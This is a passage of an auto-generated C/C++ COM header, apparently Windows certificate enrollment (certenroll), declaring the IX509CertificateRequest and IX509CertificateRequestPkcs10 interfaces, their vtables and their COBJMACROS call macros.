#define IX509CertificateRequest_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequest_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequest_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequest_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequest_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequest_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequest_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequest_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequest_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequest_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequest_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequest_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequest_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequest_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequest_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequest_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequest_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequest_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequest_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequest_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequest_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequest_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequest_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRequest_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0076 */
/* [local] */ 

typedef 
enum Pkcs10AllowedSignatureTypes
    {
        AllowedKeySignature	= 0x1,
        AllowedNullSignature	= 0x2
    } 	Pkcs10AllowedSignatureTypes;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0076_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0076_v0_0_s_ifspec;

#ifndef __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__
#define __IX509CertificateRequestPkcs10_INTERFACE_DEFINED__

/* interface IX509CertificateRequestPkcs10 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequestPkcs10;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab342-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequestPkcs10 : public IX509CertificateRequest
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromTemplateName( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE InitializeFromPrivateKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromPublicKey( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificate( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions = InheritDefault) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CheckSignature( 
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes = AllowedKeySignature) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE IsSmartCard( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TemplateObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_PrivateKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_NullSigned( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReuseKey( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OldCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Subject( 
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Subject( 
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspStatuses( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_SmimeCapabilities( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignatureInformation( 
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_KeyContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CryptAttributes( 
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CriticalExtensions( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawDataToBeSigned( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Signature( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCspStatuses( 
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestPkcs10Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequestPkcs10 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromTemplateName )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *InitializeFromPrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PrivateKey *pPrivateKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromPublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in_opt IX509PublicKey *pPublicKey,
            /* [in] */ __RPC__in BSTR strTemplateName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strCertificate,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [defaultvalue][in] */ X509RequestInheritOptions InheritOptions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR strEncodedData,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *CheckSignature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ Pkcs10AllowedSignatureTypes AllowedSignatureTypes);
        
        HRESULT ( STDMETHODCALLTYPE *IsSmartCard )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TemplateObjectId )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PublicKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_PrivateKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509PrivateKey **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_NullSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ReuseKey )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX500DistinguishedName **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Subject )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in_opt IX500DistinguishedName *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_SmimeCapabilities )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerNamePrefix )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CryptAttributes )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt ICryptAttributes **ppValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CriticalExtensions )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressOids )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCspStatuses )( 
            __RPC__in IX509CertificateRequestPkcs10 * This,
            /* [in] */ X509KeySpec KeySpec,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatuses **ppCspStatuses);
        
        END_INTERFACE
    } IX509CertificateRequestPkcs10Vtbl;

    interface IX509CertificateRequestPkcs10
    {
        CONST_VTBL struct IX509CertificateRequestPkcs10Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequestPkcs10_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequestPkcs10_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequestPkcs10_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequestPkcs10_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequestPkcs10_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequestPkcs10_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequestPkcs10_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequestPkcs10_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

#define IX509CertificateRequestPkcs10_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRequestPkcs10_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRequestPkcs10_GetInnerRequest(This,Level,ppValue)	\
    ( (This)->lpVtbl -> GetInnerRequest(This,Level,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_EnrollmentContext(This,pValue)	\
    ( (This)->lpVtbl -> get_EnrollmentContext(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_Silent(This,pValue)	\
    ( (This)->lpVtbl -> get_Silent(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_Silent(This,Value)	\
    ( (This)->lpVtbl -> put_Silent(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_ParentWindow(This,pValue)	\
    ( (This)->lpVtbl -> get_ParentWindow(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ParentWindow(This,Value)	\
    ( (This)->lpVtbl -> put_ParentWindow(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_UIContextMessage(This,pValue)	\
    ( (This)->lpVtbl -> get_UIContextMessage(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_UIContextMessage(This,Value)	\
    ( (This)->lpVtbl -> put_UIContextMessage(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_SuppressDefaults(This,pValue)	\
    ( (This)->lpVtbl -> get_SuppressDefaults(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_SuppressDefaults(This,Value)	\
    ( (This)->lpVtbl -> put_SuppressDefaults(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RenewalCertificate(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RenewalCertificate(This,Encoding,pValue) ) 

#define IX509CertificateRequestPkcs10_put_RenewalCertificate(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_RenewalCertificate(This,Encoding,Value) ) 

#define IX509CertificateRequestPkcs10_get_ClientId(This,pValue)	\
    ( (This)->lpVtbl -> get_ClientId(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_ClientId(This,Value)	\
    ( (This)->lpVtbl -> put_ClientId(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_CspInformations(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformations(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_CspInformations(This,pValue)	\
    ( (This)->lpVtbl -> put_CspInformations(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRequestPkcs10_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRequestPkcs10_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509CertificateRequestPkcs10_InitializeFromTemplateName(This,Context,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromTemplateName(This,Context,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPrivateKey(This,Context,pPrivateKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName)	\
    ( (This)->lpVtbl -> InitializeFromPublicKey(This,Context,pPublicKey,strTemplateName) ) 

#define IX509CertificateRequestPkcs10_InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,Context,strCertificate,Encoding,InheritOptions) ) 

#define IX509CertificateRequestPkcs10_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRequestPkcs10_CheckSignature(This,AllowedSignatureTypes)	\
    ( (This)->lpVtbl -> CheckSignature(This,AllowedSignatureTypes) ) 

#define IX509CertificateRequestPkcs10_IsSmartCard(This,pValue)	\
    ( (This)->lpVtbl -> IsSmartCard(This,pValue) ) 

#define IX509CertificateRequestPkcs10_get_TemplateObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_TemplateObjectId(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PublicKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PublicKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#define IX509CertificateRequestPkcs10_get_NullSigned(This,pValue)	\
